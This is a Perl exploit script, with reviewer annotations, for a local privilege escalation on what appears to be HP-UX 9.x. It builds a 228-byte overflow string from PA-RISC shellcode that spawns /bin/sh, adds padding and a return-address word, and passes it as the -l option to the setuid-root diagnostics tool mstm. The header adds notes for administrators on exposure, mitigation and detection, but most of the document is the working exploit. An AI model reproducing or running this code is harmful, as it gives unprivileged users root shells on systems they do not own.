#!/usr/bin/perl
# Working exploit for 9.X setuid root /usr/diag/bin/[cm]stm.
#
# Overview: the script assembles a single 228-byte string and hands it to
# /usr/diag/bin/mstm as the value of its -l option.  Layout of the string:
#   offset   0  "AA" plus ten 4-byte instruction words, padded with "C" to 208
#   offset 208  "/bin/sh.sh." padded with "D" to 16 bytes
#   offset 224  the 4-byte word 7b03301B
# The instruction mnemonics in the comments are PA-RISC, so the target is
# presumably HP-UX 9.x; the script itself only says "9.X".
# NOTE(review): the trailing word looks like a replacement return address for
# an unchecked copy of the -l value into a fixed-size stack buffer; that is
# inferred from the layout, not stated by the author.
#
# For administrators of affected hosts:
#   * Exposure: the issue matters only while cstm/mstm are installed setuid
#     root (check the mode bits under /usr/diag/bin).
#   * Mitigation: apply the vendor's fix for the diagnostics package, or drop
#     the setuid bit / restrict execution to administrators until then.
#   * Detection: process-execution audit records showing cstm or mstm started
#     by an unprivileged user with a -l value of a couple of hundred bytes
#     that contains non-printable characters.

use FileHandle;    # loaded by the original; nothing below uses it

# h2cs: convert a string of hex digit pairs into the bytes they encode.
# Returns undef for an empty string.
sub h2cs {
    my ($hex) = @_;
    my $bytes;

    # NOTE(review): with an odd number of digits neither substitution matches
    # the last lone character, so $hex never shrinks and the loop never ends.
    # Every call in this file passes exactly eight digits.
    until ($hex =~ /^$/) {
        (my $pair = $hex) =~ s/^(..).*$/$1/;    # keep the leading two digits
        $hex =~ s/^..//;                        # and consume them
        $bytes .= chr(oct("0x${pair}"));
    }
    return $bytes;
}

# Instruction words in the order they are appended; mnemonics are the
# original author's annotations.
my @insn_words = (
    "34010102",    # ldi 129,r1
    "08220401",    # sub rp,r1,r1
    "602002a6",    # stb r0,339(r1)
    # "602002ac",  # stb r0,342(r1)        (disabled in the original)
    "b43a0298",    # addi 332,r1,arg0
    "34160176",    # ldi 187,r22
    "34010276",    # ldi 315,r1
    "08360216",    # and r22,r1,r22        (187 & 315 == 59)
    "20200801",    # ldil l%c0000004,r1
    "e420e008",    # ble 4(sr7,r1)
    "08210280",    # NOP == xor r1,r1,r0
    # "deadcafe",  # illegal instruction   (disabled in the original)
);

my $code = "AA";    # two byte alignment
$code .= h2cs($_) for @insn_words;
$code .= "C" x (208 - length($code));    # pad the code area to 208 bytes

# The "." characters are placeholders; presumably the stb instruction above
# zeroes one of them at run time, since an argv string cannot carry a NUL
# byte itself -- TODO confirm against the offsets.
my $data = "/bin/sh.sh.";
$data .= "D" x (16 - length($data));     # pad the data area to 16 bytes

my $optarg;

# NOTE(review): dead store kept from the original -- $optarg is still
# undefined here, so this evaluates to 224 and the result is never used.
my $num = 224 - length($optarg);

$optarg = $code . $data;
$optarg .= h2cs("7b03301B");             # final 4-byte word at offset 224

# Sanity check for the operator: prints 228 when the layout above is intact.
print "Length is: ", length($optarg), "\n";

# List-form exec: no shell is involved, so the bytes reach mstm's argv as is.
exec("/usr/diag/bin/mstm", "-l", "$optarg");